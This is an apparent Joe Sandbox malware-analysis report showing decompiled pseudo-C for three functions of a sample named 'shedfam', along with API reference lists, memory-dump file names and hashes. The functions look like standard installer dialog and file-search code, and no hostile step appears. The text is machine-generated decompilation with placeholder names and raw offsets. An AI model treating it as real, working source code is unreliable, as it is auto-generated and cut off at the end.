                                                                  • API String ID: 123533781-501415292
                                                                  • Opcode ID: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                                                                  • Instruction ID: 2bdc35c2d2963d88c22d289f5388ef8df5706d1624f03911357c3292c4b85553
                                                                  • Opcode Fuzzy Hash: 8b9c2e5640cd10c82be1a956849ef5df59aae12c3e21675f706a7f9f4a475de0
                                                                  • Instruction Fuzzy Hash: B2416275A00204BFDB00EFA4CD89E9E7BB6EF49314B20416AF905EB2D1CA79DD41CB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 39%
                                                                  			E00402654(char __ebx, char* __edi, char* __esi) {
                                                                  				void* _t19;
                                                                  
                                                                  				if(FindFirstFileA(E00402A0C(2), _t19 - 0x19c) != 0xffffffff) {
                                                                  					E00405C59(__edi, _t6);
                                                                  					_push(_t19 - 0x170);
                                                                  					_push(__esi);
                                                                  					E00405CFB();
                                                                  				} else {
                                                                  					 *__edi = __ebx;
                                                                  					 *__esi = __ebx;
                                                                  					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                  				}
                                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t19 - 4));
                                                                  				return 0;
                                                                  			}




                                                                  0x0040266c
                                                                  0x00402680
                                                                  0x0040268b
                                                                  0x0040268c
                                                                  0x004027c7
                                                                  0x0040266e
                                                                  0x0040266e
                                                                  0x00402670
                                                                  0x00402672
                                                                  0x00402672
                                                                  0x004028a4
                                                                  0x004028b0

                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402663
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                                                                  • Instruction ID: 2317ffd169cfaf4cb587e6187c2204c3bd1190871e25379d9522107c79eb17b9
                                                                  • Opcode Fuzzy Hash: 3e31af45bbe9dbcba2c239d5de48bd9256fd7baf997d6aca0ab2e4b00858bcc3
                                                                  • Instruction Fuzzy Hash: 3AF0A732508100DAD710E7B49949AEEB368EF51328F60457BE505F20C1C6B84945DB2E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 83%
                                                                  			E00403AE4(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                  				struct HWND__* _v32;
                                                                  				void* _v84;
                                                                  				void* _v88;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed int _t35;
                                                                  				signed int _t37;
                                                                  				signed int _t39;
                                                                  				struct HWND__* _t49;
                                                                  				signed int _t67;
                                                                  				struct HWND__* _t73;
                                                                  				signed int _t86;
                                                                  				struct HWND__* _t91;
                                                                  				signed int _t99;
                                                                  				int _t103;
                                                                  				signed int _t115;
                                                                  				signed int _t116;
                                                                  				int _t117;
                                                                  				signed int _t122;
                                                                  				struct HWND__* _t125;
                                                                  				struct HWND__* _t126;
                                                                  				int _t127;
                                                                  				long _t130;
                                                                  				int _t132;
                                                                  				int _t133;
                                                                  				void* _t134;
                                                                  				void* _t141;
                                                                  
                                                                  				_t115 = _a8;
                                                                  				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                  					_t35 = _a12;
                                                                  					_t125 = _a4;
                                                                  					__eflags = _t115 - 0x110;
                                                                  					 *0x420564 = _t35;
                                                                  					if(_t115 == 0x110) {
                                                                  						 *0x423f88 = _t125;
                                                                  						 *0x420578 = GetDlgItem(_t125, 1);
                                                                  						_t91 = GetDlgItem(_t125, 2);
                                                                  						_push(0xffffffff);
                                                                  						_push(0x1c);
                                                                  						 *0x41f540 = _t91;
                                                                  						E00403FB7(_t125);
                                                                  						SetClassLongA(_t125, 0xfffffff2,  *0x423768);
                                                                  						 *0x42374c = E0040140B(4);
                                                                  						_t35 = 1;
                                                                  						__eflags = 1;
                                                                  						 *0x420564 = 1;
                                                                  					}
                                                                  					_t122 =  *0x4091e8; // 0xffffffff
                                                                  					_t133 = 0;
                                                                  					_t130 = (_t122 << 6) +  *0x423fa0;
                                                                  					__eflags = _t122;
                                                                  					if(_t122 < 0) {
                                                                  						L34:
                                                                  						E00404003(0x40b);
                                                                  						while(1) {
                                                                  							_t37 =  *0x420564;
                                                                  							 *0x4091e8 =  *0x4091e8 + _t37;
                                                                  							_t130 = _t130 + (_t37 << 6);
                                                                  							_t39 =  *0x4091e8; // 0xffffffff
                                                                  							__eflags = _t39 -  *0x423fa4;
                                                                  							if(_t39 ==  *0x423fa4) {
                                                                  								E0040140B(1);
                                                                  							}
                                                                  							__eflags =  *0x42374c - _t133;
                                                                  							if( *0x42374c != _t133) {
                                                                  								break;
                                                                  							}
                                                                  							__eflags =  *0x4091e8 -  *0x423fa4; // 0xffffffff
                                                                  							if(__eflags >= 0) {
                                                                  								break;
                                                                  							}
                                                                  							_t116 =  *(_t130 + 0x14);
                                                                  							E00405D1D(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                  							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                  							_push(0xfffffc19);
                                                                  							E00403FB7(_t125);
                                                                  							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                  							_push(0xfffffc1b);
                                                                  							E00403FB7(_t125);
                                                                  							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                  							_push(0xfffffc1a);
                                                                  							E00403FB7(_t125);
                                                                  							_t49 = GetDlgItem(_t125, 3);
                                                                  							__eflags =  *0x42400c - _t133;
                                                                  							_v32 = _t49;
                                                                  							if( *0x42400c != _t133) {
                                                                  								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                  								__eflags = _t116;
                                                                  							}
                                                                  							ShowWindow(_t49, _t116 & 0x00000008);
                                                                  							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                                  							E00403FD9(_t116 & 0x00000002);
                                                                  							_t117 = _t116 & 0x00000004;
                                                                  							EnableWindow( *0x41f540, _t117);
                                                                  							__eflags = _t117 - _t133;
                                                                  							if(_t117 == _t133) {
                                                                  								_push(1);
                                                                  							} else {
                                                                  								_push(_t133);
                                                                  							}
                                                                  							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                  							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                                  							__eflags =  *0x42400c - _t133;
                                                                  							if( *0x42400c == _t133) {
                                                                  								_push( *0x420578);
                                                                  							} else {
                                                                  								SendMessageA(_t125, 0x401, 2, _t133);
                                                                  								_push( *0x41f540);
                                                                  							}
                                                                  							E00403FEC();
                                                                  							E00405CFB(0x420580, 0x423780);
                                                                  							E00405D1D(0x420580, _t125, _t130,  &(0x420580[lstrlenA(0x420580)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                  							SetWindowTextA(_t125, 0x420580);
                                                                  							_push(_t133);
                                                                  							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                  							__eflags = _t67;
                                                                  							if(_t67 != 0) {
                                                                  								continue;
                                                                  							} else {
                                                                  								__eflags =  *_t130 - _t133;
                                                                  								if( *_t130 == _t133) {
                                                                  									continue;
                                                                  								}
                                                                  								__eflags =  *(_t130 + 4) - 5;
                                                                  								if( *(_t130 + 4) != 5) {
                                                                  									DestroyWindow( *0x423758);
                                                                  									 *0x41fd50 = _t130;
                                                                  									__eflags =  *_t130 - _t133;
                                                                  									if( *_t130 <= _t133) {
                                                                  										goto L58;
                                                                  									}
                                                                  									_t73 = CreateDialogParamA( *0x423f80,  *_t130 +  *0x423760 & 0x0000ffff, _t125,  *(0x4091ec +  *(_t130 + 4) * 4), _t130);
                                                                  									__eflags = _t73 - _t133;
                                                                  									 *0x423758 = _t73;
                                                                  									if(_t73 == _t133) {
                                                                  										goto L58;
                                                                  									}
                                                                  									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                  									_push(6);
                                                                  									E00403FB7(_t73);
                                                                  									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                  									ScreenToClient(_t125, _t134 + 0x10);
                                                                  									SetWindowPos( *0x423758, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                  									_push(_t133);
                                                                  									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                  									__eflags =  *0x42374c - _t133;
                                                                  									if( *0x42374c != _t133) {
                                                                  										goto L61;
                                                                  									}
                                                                  									ShowWindow( *0x423758, 8);
                                                                  									E00404003(0x405);
                                                                  									goto L58;
                                                                  								}
                                                                  								__eflags =  *0x42400c - _t133;
                                                                  								if( *0x42400c != _t133) {
                                                                  									goto L61;
                                                                  								}
                                                                  								__eflags =  *0x424000 - _t133;
                                                                  								if( *0x424000 != _t133) {
                                                                  									continue;
                                                                  								}
                                                                  								goto L61;
                                                                  							}
                                                                  						}
                                                                  						DestroyWindow( *0x423758);
                                                                  						 *0x423f88 = _t133;
                                                                  						EndDialog(_t125,  *0x41f948);
                                                                  						goto L58;
                                                                  					} else {
                                                                  						__eflags = _t35 - 1;
                                                                  						if(_t35 != 1) {
                                                                  							L33:
                                                                  							__eflags =  *_t130 - _t133;
                                                                  							if( *_t130 == _t133) {
                                                                  								goto L61;
                                                                  							}
                                                                  							goto L34;
                                                                  						}
                                                                  						_push(0);
                                                                  						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                                  						__eflags = _t86;
                                                                  						if(_t86 == 0) {
                                                                  							goto L33;
                                                                  						}
                                                                  						SendMessageA( *0x423758, 0x40f, 0, 1);
                                                                  						__eflags =  *0x42374c;
                                                                  						return 0 |  *0x42374c == 0x00000000;
                                                                  					}
                                                                  				} else {
                                                                  					_t125 = _a4;
                                                                  					_t133 = 0;
                                                                  					if(_t115 == 0x47) {
                                                                  						SetWindowPos( *0x420558, _t125, 0, 0, 0, 0, 0x13);
                                                                  					}
                                                                  					if(_t115 == 5) {
                                                                  						asm("sbb eax, eax");
                                                                  						ShowWindow( *0x420558,  ~(_a12 - 1) & _t115);
                                                                  					}
                                                                  					if(_t115 != 0x40d) {
                                                                  						__eflags = _t115 - 0x11;
                                                                  						if(_t115 != 0x11) {
                                                                  							__eflags = _t115 - 0x111;
                                                                  							if(_t115 != 0x111) {
                                                                  								L26:
                                                                  								return E0040401E(_t115, _a12, _a16);
                                                                  							}
                                                                  							_t132 = _a12 & 0x0000ffff;
                                                                  							_t126 = GetDlgItem(_t125, _t132);
                                                                  							__eflags = _t126 - _t133;
                                                                  							if(_t126 == _t133) {
                                                                  								L13:
                                                                  								__eflags = _t132 - 1;
                                                                  								if(_t132 != 1) {
                                                                  									__eflags = _t132 - 3;
                                                                  									if(_t132 != 3) {
                                                                  										_t127 = 2;
                                                                  										__eflags = _t132 - _t127;
                                                                  										if(_t132 != _t127) {
                                                                  											L25:
                                                                  											SendMessageA( *0x423758, 0x111, _a12, _a16);
                                                                  											goto L26;
                                                                  										}
                                                                  										__eflags =  *0x42400c - _t133;
                                                                  										if( *0x42400c == _t133) {
                                                                  											_t99 = E0040140B(3);
                                                                  											__eflags = _t99;
                                                                  											if(_t99 != 0) {
                                                                  												goto L26;
                                                                  											}
                                                                  											 *0x41f948 = 1;
                                                                  											L21:
                                                                  											_push(0x78);
                                                                  											L22:
                                                                  											E00403F90();
                                                                  											goto L26;
                                                                  										}
                                                                  										E0040140B(_t127);
                                                                  										 *0x41f948 = _t127;
                                                                  										goto L21;
                                                                  									}
                                                                  									__eflags =  *0x4091e8 - _t133; // 0xffffffff
                                                                  									if(__eflags <= 0) {
                                                                  										goto L25;
                                                                  									}
                                                                  									_push(0xffffffff);
                                                                  									goto L22;
                                                                  								}
                                                                  								_push(_t132);
                                                                  								goto L22;
                                                                  							}
                                                                  							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                                  							_t103 = IsWindowEnabled(_t126);
                                                                  							__eflags = _t103;
                                                                  							if(_t103 == 0) {
                                                                  								goto L61;
                                                                  							}
                                                                  							goto L13;
                                                                  						}
                                                                  						SetWindowLongA(_t125, _t133, _t133);
                                                                  						return 1;
                                                                  					} else {
                                                                  						DestroyWindow( *0x423758);
                                                                  						 *0x423758 = _a12;
                                                                  						L58:
                                                                  						_t141 =  *0x421580 - _t133; // 0x0
                                                                  						if(_t141 == 0 &&  *0x423758 != _t133) {
                                                                  							ShowWindow(_t125, 0xa);
                                                                  							 *0x421580 = 1;
                                                                  						}
                                                                  						L61:
                                                                  						return 0;
                                                                  					}
                                                                  				}
                                                                  			}































                                                                  0x00403aed
                                                                  0x00403af6
                                                                  0x00403c37
                                                                  0x00403c3b
                                                                  0x00403c3f
                                                                  0x00403c41
                                                                  0x00403c46
                                                                  0x00403c51
                                                                  0x00403c5c
                                                                  0x00403c61
                                                                  0x00403c63
                                                                  0x00403c65
                                                                  0x00403c68
                                                                  0x00403c6d
                                                                  0x00403c7b
                                                                  0x00403c88
                                                                  0x00403c8f
                                                                  0x00403c8f
                                                                  0x00403c90
                                                                  0x00403c90
                                                                  0x00403c95
                                                                  0x00403c9b
                                                                  0x00403ca2
                                                                  0x00403ca8
                                                                  0x00403caa
                                                                  0x00403cea
                                                                  0x00403cef
                                                                  0x00403cf4
                                                                  0x00403cf4
                                                                  0x00403cf9
                                                                  0x00403d02
                                                                  0x00403d04
                                                                  0x00403d09
                                                                  0x00403d0f
                                                                  0x00403d13
                                                                  0x00403d13
                                                                  0x00403d18
                                                                  0x00403d1e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403d29
                                                                  0x00403d2f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403d38
                                                                  0x00403d40
                                                                  0x00403d45
                                                                  0x00403d48
                                                                  0x00403d4e
                                                                  0x00403d53
                                                                  0x00403d56
                                                                  0x00403d5c
                                                                  0x00403d61
                                                                  0x00403d64
                                                                  0x00403d6a
                                                                  0x00403d72
                                                                  0x00403d78
                                                                  0x00403d7e
                                                                  0x00403d82
                                                                  0x00403d89
                                                                  0x00403d89
                                                                  0x00403d89
                                                                  0x00403d93
                                                                  0x00403da5
                                                                  0x00403db1
                                                                  0x00403db6
                                                                  0x00403dc0
                                                                  0x00403dc6
                                                                  0x00403dc8
                                                                  0x00403dcd
                                                                  0x00403dca
                                                                  0x00403dca
                                                                  0x00403dca
                                                                  0x00403ddd
                                                                  0x00403df5
                                                                  0x00403df7
                                                                  0x00403dfd
                                                                  0x00403e12
                                                                  0x00403dff
                                                                  0x00403e08
                                                                  0x00403e0a
                                                                  0x00403e0a
                                                                  0x00403e18
                                                                  0x00403e28
                                                                  0x00403e39
                                                                  0x00403e40
                                                                  0x00403e46
                                                                  0x00403e4a
                                                                  0x00403e4f
                                                                  0x00403e51
                                                                  0x00000000
                                                                  0x00403e57
                                                                  0x00403e57
                                                                  0x00403e59
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403e5f
                                                                  0x00403e63
                                                                  0x00403e88
                                                                  0x00403e8e
                                                                  0x00403e94
                                                                  0x00403e96
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403ebc
                                                                  0x00403ec2
                                                                  0x00403ec4
                                                                  0x00403ec9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403ecf
                                                                  0x00403ed2
                                                                  0x00403ed5
                                                                  0x00403eec
                                                                  0x00403ef8
                                                                  0x00403f11
                                                                  0x00403f17
                                                                  0x00403f1b
                                                                  0x00403f20
                                                                  0x00403f26
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403f30
                                                                  0x00403f3b
                                                                  0x00000000
                                                                  0x00403f3b
                                                                  0x00403e65
                                                                  0x00403e6b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403e71
                                                                  0x00403e77
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403e7d
                                                                  0x00403e51
                                                                  0x00403f48
                                                                  0x00403f54
                                                                  0x00403f5b
                                                                  0x00000000
                                                                  0x00403cac
                                                                  0x00403cac
                                                                  0x00403caf
                                                                  0x00403ce2
                                                                  0x00403ce2
                                                                  0x00403ce4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403ce4
                                                                  0x00403cb1
                                                                  0x00403cb5
                                                                  0x00403cba
                                                                  0x00403cbc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403ccc
                                                                  0x00403cd4
                                                                  0x00000000
                                                                  0x00403cda
                                                                  0x00403b08
                                                                  0x00403b08
                                                                  0x00403b0c
                                                                  0x00403b11
                                                                  0x00403b20
                                                                  0x00403b20
                                                                  0x00403b29
                                                                  0x00403b32
                                                                  0x00403b3d
                                                                  0x00403b3d
                                                                  0x00403b49
                                                                  0x00403b65
                                                                  0x00403b68
                                                                  0x00403b7b
                                                                  0x00403b81
                                                                  0x00403c24
                                                                  0x00000000
                                                                  0x00403c2d
                                                                  0x00403b87
                                                                  0x00403b94
                                                                  0x00403b96
                                                                  0x00403b98
                                                                  0x00403bb7
                                                                  0x00403bb7
                                                                  0x00403bba
                                                                  0x00403bbf
                                                                  0x00403bc2
                                                                  0x00403bd2
                                                                  0x00403bd3
                                                                  0x00403bd5
                                                                  0x00403c0b
                                                                  0x00403c1e
                                                                  0x00000000
                                                                  0x00403c1e
                                                                  0x00403bd7
                                                                  0x00403bdd
                                                                  0x00403bf6
                                                                  0x00403bfb
                                                                  0x00403bfd
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403bff
                                                                  0x00403beb
                                                                  0x00403beb
                                                                  0x00403bed
                                                                  0x00403bed
                                                                  0x00000000
                                                                  0x00403bed
                                                                  0x00403be0
                                                                  0x00403be5
                                                                  0x00000000
                                                                  0x00403be5
                                                                  0x00403bc4
                                                                  0x00403bca
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403bcc
                                                                  0x00000000
                                                                  0x00403bcc
                                                                  0x00403bbc
                                                                  0x00000000
                                                                  0x00403bbc
                                                                  0x00403ba2
                                                                  0x00403ba9
                                                                  0x00403baf
                                                                  0x00403bb1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403bb1
                                                                  0x00403b6d
                                                                  0x00000000
                                                                  0x00403b4b
                                                                  0x00403b51
                                                                  0x00403b5b
                                                                  0x00403f61
                                                                  0x00403f61
                                                                  0x00403f67
                                                                  0x00403f74
                                                                  0x00403f7a
                                                                  0x00403f7a
                                                                  0x00403f84
                                                                  0x00000000
                                                                  0x00403f84
                                                                  0x00403b49

                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
                                                                  • ShowWindow.USER32(?), ref: 00403B3D
                                                                  • DestroyWindow.USER32 ref: 00403B51
                                                                  • SetWindowLongA.USER32 ref: 00403B6D
                                                                  • GetDlgItem.USER32 ref: 00403B8E
                                                                  • SendMessageA.USER32 ref: 00403BA2
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403BA9
                                                                  • GetDlgItem.USER32 ref: 00403C57
                                                                  • GetDlgItem.USER32 ref: 00403C61
                                                                  • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403C7B
                                                                  • SendMessageA.USER32 ref: 00403CCC
                                                                  • GetDlgItem.USER32 ref: 00403D72
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403D93
                                                                  • EnableWindow.USER32(?,?), ref: 00403DA5
                                                                  • EnableWindow.USER32(?,?), ref: 00403DC0
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
                                                                  • EnableMenuItem.USER32 ref: 00403DDD
                                                                  • SendMessageA.USER32 ref: 00403DF5
                                                                  • SendMessageA.USER32 ref: 00403E08
                                                                  • lstrlenA.KERNEL32(00420580,?,00420580,00423780), ref: 00403E31
                                                                  • SetWindowTextA.USER32(?,00420580), ref: 00403E40
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403F74
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                  • String ID:
                                                                  • API String ID: 184305955-0
                                                                  • Opcode ID: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                                                                  • Instruction ID: 583b1d6e72ee06ddf0416b700d05e2a9c6fbe9640e5ca120217838ed285f2c24
                                                                  • Opcode Fuzzy Hash: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                                                                  • Instruction Fuzzy Hash: 00C1C471A08205BBDB216F61ED85D2B7FBCEB4470AF50443EF601B51E1C739AA429B1E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 93%
                                                                  			E004040FF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                  				char _v8;
                                                                  				signed int _v12;
                                                                  				void* _v16;
                                                                  				struct HWND__* _t52;
                                                                  				long _t86;
                                                                  				int _t98;
                                                                  				struct HWND__* _t99;
                                                                  				signed int _t100;
                                                                  				intOrPtr _t109;
                                                                  				int _t110;
                                                                  				signed int* _t112;
                                                                  				signed int _t113;
                                                                  				char* _t114;
                                                                  				CHAR* _t115;
                                                                  
                                                                  				if(_a8 != 0x110) {
                                                                  					if(_a8 != 0x111) {
                                                                  						L11:
                                                                  						if(_a8 != 0x4e) {
                                                                  							if(_a8 == 0x40b) {
                                                                  								 *0x420560 =  *0x420560 + 1;
                                                                  							}
                                                                  							L25:
                                                                  							_t110 = _a16;
                                                                  							L26:
                                                                  							return E0040401E(_a8, _a12, _t110);
                                                                  						}
                                                                  						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                  						_t110 = _a16;
                                                                  						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                  							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                  							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                  							_v12 = _t100;
                                                                  							_v16 = _t109;
                                                                  							_v8 = 0x422f20;
                                                                  							if(_t100 - _t109 < 0x800) {
                                                                  								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                  								SetCursor(LoadCursorA(0, 0x7f02));
                                                                  								_t40 =  &_v8; // 0x422f20
                                                                  								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                                                                  								SetCursor(LoadCursorA(0, 0x7f00));
                                                                  								_t110 = _a16;
                                                                  							}
                                                                  						}
                                                                  						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                  							goto L26;
                                                                  						} else {
                                                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                  								SendMessageA( *0x423f88, 0x111, 1, 0);
                                                                  							}
                                                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                  								SendMessageA( *0x423f88, 0x10, 0, 0);
                                                                  							}
                                                                  							return 1;
                                                                  						}
                                                                  					}
                                                                  					if(_a12 >> 0x10 != 0 ||  *0x420560 != 0) {
                                                                  						goto L25;
                                                                  					} else {
                                                                  						_t112 =  *0x41fd50 + 0x14;
                                                                  						if(( *_t112 & 0x00000020) == 0) {
                                                                  							goto L25;
                                                                  						}
                                                                  						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                  						E00403FD9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                  						E0040438A();
                                                                  						goto L11;
                                                                  					}
                                                                  				}
                                                                  				_t98 = _a16;
                                                                  				_t113 =  *(_t98 + 0x30);
                                                                  				if(_t113 < 0) {
                                                                  					_t113 =  *( *0x42375c - 4 + _t113 * 4);
                                                                  				}
                                                                  				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                  				_t114 = _t113 +  *0x423fb8;
                                                                  				_push(0x22);
                                                                  				_a16 =  *_t114;
                                                                  				_v12 = _v12 & 0x00000000;
                                                                  				_t115 = _t114 + 1;
                                                                  				_v16 = _t115;
                                                                  				_v8 = E004040CB;
                                                                  				E00403FB7(_a4);
                                                                  				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                  				_push(0x23);
                                                                  				E00403FB7(_a4);
                                                                  				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                  				E00403FD9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                  				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                  				E00403FEC(_t99);
                                                                  				SendMessageA(_t99, 0x45b, 1, 0);
                                                                  				_t86 =  *( *0x423f90 + 0x68);
                                                                  				if(_t86 < 0) {
                                                                  					_t86 = GetSysColor( ~_t86);
                                                                  				}
                                                                  				SendMessageA(_t99, 0x443, 0, _t86);
                                                                  				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                  				 *0x41f544 =  *0x41f544 & 0x00000000;
                                                                  				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                  				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                  				 *0x420560 =  *0x420560 & 0x00000000;
                                                                  				return 0;
                                                                  			}

















                                                                  0x0040410f
                                                                  0x00404235
                                                                  0x00404291
                                                                  0x00404295
                                                                  0x0040436c
                                                                  0x0040436e
                                                                  0x0040436e
                                                                  0x00404374
                                                                  0x00404374
                                                                  0x00404377
                                                                  0x00000000
                                                                  0x0040437e
                                                                  0x004042a3
                                                                  0x004042a5
                                                                  0x004042af
                                                                  0x004042ba
                                                                  0x004042bd
                                                                  0x004042c0
                                                                  0x004042cb
                                                                  0x004042ce
                                                                  0x004042d5
                                                                  0x004042e3
                                                                  0x004042fb
                                                                  0x00404303
                                                                  0x0040430e
                                                                  0x0040431e
                                                                  0x00404320
                                                                  0x00404320
                                                                  0x004042d5
                                                                  0x0040432a
                                                                  0x00000000
                                                                  0x00404335
                                                                  0x00404339
                                                                  0x0040434a
                                                                  0x0040434a
                                                                  0x00404350
                                                                  0x0040435e
                                                                  0x0040435e
                                                                  0x00000000
                                                                  0x00404362
                                                                  0x0040432a
                                                                  0x00404240
                                                                  0x00000000
                                                                  0x00404254
                                                                  0x0040425a
                                                                  0x00404260
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404285
                                                                  0x00404287
                                                                  0x0040428c
                                                                  0x00000000
                                                                  0x0040428c
                                                                  0x00404240
                                                                  0x00404115
                                                                  0x00404118
                                                                  0x0040411d
                                                                  0x0040412e
                                                                  0x0040412e
                                                                  0x00404135
                                                                  0x00404138
                                                                  0x0040413a
                                                                  0x0040413f
                                                                  0x00404148
                                                                  0x0040414e
                                                                  0x0040415a
                                                                  0x0040415d
                                                                  0x00404166
                                                                  0x0040416b
                                                                  0x0040416e
                                                                  0x00404173
                                                                  0x0040418a
                                                                  0x00404191
                                                                  0x004041a4
                                                                  0x004041a7
                                                                  0x004041bc
                                                                  0x004041c3
                                                                  0x004041c8
                                                                  0x004041cd
                                                                  0x004041cd
                                                                  0x004041dc
                                                                  0x004041eb
                                                                  0x004041ed
                                                                  0x00404203
                                                                  0x00404212
                                                                  0x00404214
                                                                  0x00000000

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
